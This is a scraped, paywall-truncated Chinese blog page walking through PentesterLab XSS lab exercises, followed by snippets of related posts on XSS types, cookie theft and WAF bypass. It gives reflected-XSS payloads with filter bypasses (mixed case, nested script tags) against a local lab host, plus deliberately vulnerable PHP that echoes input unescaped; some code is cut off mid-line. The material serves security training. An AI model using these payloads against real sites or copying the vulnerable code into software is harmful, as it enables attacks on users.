pentesterlab xss漏洞分析

最新推荐文章于 2024-05-02 10:30:00 发布
最新推荐文章于 2024-05-02 10:30:00 发布
阅读量1.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nushare/article/details/18301369
版权
本文介绍了pentesterlab作为渗透测试学习平台的特点,并详细解析了多个XSS漏洞案例,包括利用大小写绕过、嵌套script标签、eval函数及POST方法等方法进行攻击。
摘要由CSDN通过智能技术生成 


  pentesterlab简介

  pentesterlab官方定义自己是一个简单又十分有效学习渗透测试的演练平台。

  pentesterlab环境搭建

  官方提供了一个基于debian6的镜像,官网下载镜像,使用vmware建立一个虚拟机,启动即可。

  ps:官方文档建议做一个host绑定,方便后面使用

  windows下hosts文件目录:C:\Windows\System32\Drivers\etc\hosts,打开后添加以下一行

  192.168.1.100 vulnerable # 具体ip可以在虚拟机中使用ifconfig查看

  xss分析

  第一个xss非常简单,直接输入即可

  // 

  http://vulnerable/xss/example1.php?name=%3Cscript%3Ealert(1)%3C/script%3E

  它对应的代码如下

   

  echo $_GET["name"];

  ?>

  第二个xss过滤了 小写的,可以使用大小写绕过

  // 

  http://vulnerable/xss/example2.php?name=%3CsCript%3Ealert(1);%3C/scrIpt%3E

  它对应的代码如下

   

  $name = $_GET["name"];

  $name = preg_replace("/,可以使用嵌套的script标签绕过

  // ipt>alert(1)Ipt>

  http://vulnerable/xss/example3.php?name=%3CsCr%3CscriPt%3Eipt%3Ealert(1)%3C/scr%3C/scRipt%3EIpt%3E

  它对应的代码如下

   

  $name = $_GET["name"];

  $name = preg_r
最低0.47元/天 解锁文章
Jasky_Death
关注
Web安全--XSS(跨站脚本攻击)
bobo_milk的博客
11-14 855
攻击者向web页面插入恶意可执行脚本代码,当用户浏览该页面时,嵌入到web页面的恶意代码就会被执行,从而达到攻击者盗取用户信息或侵犯用户安全隐私的目的。存储型:代码存放在服务器中,一般在个人信息或留言等地方,每当访问该页面就会触发代码(具有很高隐蔽性)DOM型:处理后的结果会成为页面的一部分,不提交数据到服务器,从客户端获得DOM中的数据在本地执行。存储型:发送一次带有xss代码的请求,以后在这个页面数据包都会有xss代码。反射型:发送一次带有xss代码的请求,只在当前数据包会有xss代码。
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 968
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
pentesterlab xss(writeup)
一个安全研究员
04-03 1741
example1 第一题往往都是热身题,没有任何的过滤。通过查看源码发现我们输入的内容时直接输出在html标签之间的,所以直接插入: <script>alert(1)</script> 注:这里我自己一直有一个误区,今天偶然看到一篇文章才发现,原来审查元素看到的并不是源代码,之前一直是这样查看源码的,有时候会有一些差异,因为源码是我们直接从服务器取过来的代码...
pentesterlab学习记录-week2
繁华褪尽始见真
03-30 819
———————————————————————————————————————————————————————— Week2: HTTP 在虚拟机里安装apache,然后用vim修改默认主页的内容,最后在宿主机上访问这个主页修改宿主机的host文件,将虚拟机命名为“vulnerable”用HTTP函数库写一个客户端来获取虚拟机上的主页用Socket函数库写一个客户端来获取虚拟机上的主页
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 497
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2252
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
网络安全考题,面试题-含答案.pdf
02-06
- 总结报告与修复建议:提供详细的漏洞分析报告,并给出修复漏洞和强化安全性的建议。 4. **学习和资源**: - 有许多在线平台和社区可以帮助学习网络安全,如Seebug、FreeBuf、吾爱破解、看雪论坛、阿里聚安全、...
Webug3.0-渗透基础-解题
Blood_Pupil的博客
03-13 7461
Webug下载与安装 首先在Webug3.0官网 下载虚拟机 在本地进行解压,解压后为Win2003 VM虚拟机镜像。 虚拟机密码为123456,崩溃后可以直接将快照恢复到gh0st即可。 在kali下可以使用 Vmware Linux版打开,Windonws 下可以使用 Vmware Windows版打开,Mac下可以使用 Vmware Fusion打开。 在虚拟机命令窗口敲入ipconfi...
渗透测试练习靶场汇总
最新发布
zz12345600354的博客
05-02 259
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //
网络信息安全攻防学习平台-脚本关 writeup
热门推荐
4ct10n
09-17 2万+
1.key又又找不到了直接burpsuit截断 出flag key is : yougotit_script_now2 .快速口算这道题比较有意思 在两秒钟之内回答他的算术题 思路:直接编写python脚本访问网站,获取html计算算式,得出答案,post传参,注意要建立长连接。 代码如下:#-*-coding:utf-8-*- import requests, re url = '
xss-labs 通关笔记
Ewige的博客
06-30 530
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
XSS技巧总结
ciganqi8046的博客
07-29 148
1、注意一些容易危险函数。如javascript的replace函数,默认只会替换匹配的第一个字符串。如: var data = "xxx"//为用户可以控制的值 data = data.replace(/</,'&lt;').replace(/>/,'&g...
《WEB安全漏洞30讲》(第3讲)XSS漏洞
午夜安全
12-04 617
XSS(Cross-site Scripting)跨站脚本,它是代码注入的一种,指的是攻击者在页面注入恶意的脚本代码,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可以盗取用户的Cookie,获取用户的网页内容、破坏页面结构、重定向到其它网站等。XSS一般可以分为: 反射型、存储型和DOM 型XSS。反射型XSS又称非持久型XSS,这种方式往往具有一次性。攻击者需要想办法将包含XSS代码的恶意链接发送给目标用户并且诱惑用户点击该链接,当用户点击后会向服务器发送请求,服务器接收到请求后把
XSS编码初析
weixin_30814329的博客
08-04 215
首先我们应当了解,当我们发送一个请求链接时,服务器与客户端都发生了什么 这里仅涉及到js的编码问题,因此就编码来说,首先我们确定我们发出的请求是采用GET的方式还是采用POST的方式 若采用GET的方式,则客户是通过URL地址发送请求链接,既然是URL链接就需要对其进行URL编码,客户端首先对其进行URL编码,之后发送给服务器端,服务器端受到该GET请求后,首先解析请求链接,因此就对URL进行...
简单易懂的XSS(跨站脚本攻击)
weixin_47204991的博客
10-29 1929
跨站脚本(简称为XSS或跨站脚本或跨站脚本攻击)是针对Web应用程序的安全漏洞攻击,允许用户插入恶意的脚本,从而当用户浏览网页时,插入的脚本就会执行。从而达到攻击的目的。 1.反射型XSS 反射型XSS又叫非持久性XSS,反射型XSS注入的恶意代码不会保存在服务器端,需要欺骗用户去点击恶意链接才能攻击成功。一般通过XSS来窃取用户的cookie。 反射型XSS攻击流程: 2.存储型XSS 存储型XSS又叫持久型XSS,攻击脚本会永久存储在目标服务器中。例如在个人信息或者留言板之类的地方插入恶意脚本,用户访
靶机12 PENTESTER LAB: XSS AND MYSQL FILE
honest_gg的博客
10-09 1926
本靶机练习说明如何使用跨站点脚本漏洞来访问管理员的 Cookie。然后,如何使用他/她的会话来访问管理以查找SQL注入并使用它获得代码执行。
web for pentester XSS部分练习
若为此弦
08-21 3793
example 1 url上改成name=
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1565
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
html%3cb%3e标签,用最短的payload绕过WAF(入门)
weixin_39695490的博客
06-19 1371
想绕过一个WAF,我们可以用最短的payload来做,这里只是基础示例,望各位大佬勿喷,小弟在此谢过。我在这里先使用一个网页举例。然后输入经典的payload拒绝访问!看起来像是WAF正在限制我们的方式。所以我要用URL编码对我们的payload进行编码。可以在搜索引擎上找到一些可以做到这一点的网站,但我喜欢用火狐的HackBar插件。所以我把我的payload进行了编码。现在来看看是否可以绕过W...
DOM型XSS漏洞测试payload大全
XSS漏洞 DOM型测试 payload代码” 在网络安全领域,XSS(Cross-Site Scripting)漏洞是一种常见的安全威胁,它允许攻击者在用户的浏览器中注入恶意脚本,从而控制用户与网站的交互。DOM型XSSXSS漏洞的一种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值